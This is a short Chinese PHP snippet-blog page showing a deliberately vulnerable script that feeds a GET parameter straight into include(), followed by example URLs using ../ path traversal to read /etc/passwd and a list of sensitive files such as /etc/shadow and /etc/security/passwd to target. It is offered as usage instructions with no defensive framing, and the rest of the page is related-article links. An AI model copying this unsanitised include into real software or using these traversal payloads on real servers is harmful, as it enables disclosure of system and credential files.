php 伪造本地文件包含漏洞的代码

yipeiwu_com6年前 (2020-03-06)PHP代码库

代码:

 
<?php 
$page=$_GET['page']; 
include($page.'php'); 
?> 

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach

返回列表

上一篇：Python字符转换

下一篇：PHP生成静态页面详解

一个简洁实用的PHP缓存类完整实例

本文完整描述了一个简洁实用的PHP缓存类，可用来检查缓存文件是否在设置更新时间之内、清除缓存文件、根据当前动态文件生成缓存文件名、连续创建目录、缓存文件输出静态等功能。对于采用PHP开发...

thinkphp在低版本Nginx 下支持PATHINFO的方法分享

最近在用thinkphp做一个项目，基本完成后部署到nginx服务器上才发觉nginx是不支持pathinfo的那么我们如何来处理呢。 Nginx环境在Nginx低版本中，是不支持PA...

getimagesize获取图片尺寸实例

本文实例讲述了getimagesize获取图片尺寸的方法。分享给大家供大家参考。具体如下： php有现成的函数getimagesize用于获取图像的尺寸,代码示例: 复制代码代码如下:...

php5.3提示Function ereg() is deprecated Error问题解决方法

本文实例讲述了php5.3提示Function ereg() is deprecated Error问题解决方法。分享给大家供大家参考。具体实现方法如下：一、问题： PHP 5.3 e...

php构造函数实例讲解

PHP官网定义：复制代码代码如下:构造函数是类中的一个特殊函数，当使用 new 操作符创建一个类的实例时，构造函数将会自动调用。当函数与类同名时，这个函数将成为构造函数。如果一个类没有...

宜配屋

php 伪造本地文件包含漏洞的代码

相关文章

一个简洁实用的PHP缓存类完整实例

thinkphp在低版本Nginx 下支持PATHINFO的方法分享

getimagesize获取图片尺寸实例

php5.3提示Function ereg() is deprecated Error问题解决方法

php构造函数实例讲解

© YiPeiWu.com 【宜配屋】粤ICP备17031333号

Powered By Z-BlogPHP. Theme by TOYEAN.

宜配屋

php 伪造本地文件包含漏洞的代码

相关文章

一个简洁实用的PHP缓存类完整实例

thinkphp在低版本Nginx 下支持PATHINFO的方法分享

getimagesize获取图片尺寸实例

php5.3提示Function ereg() is deprecated Error问题解决方法

php构造函数实例讲解

© YiPeiWu.com 【宜配屋】 粤ICP备17031333号 var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?8aa60ae04b767b2af31903508928acc0"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();

Powered By Z-BlogPHP. Theme by TOYEAN.

© YiPeiWu.com 【宜配屋】粤ICP备17031333号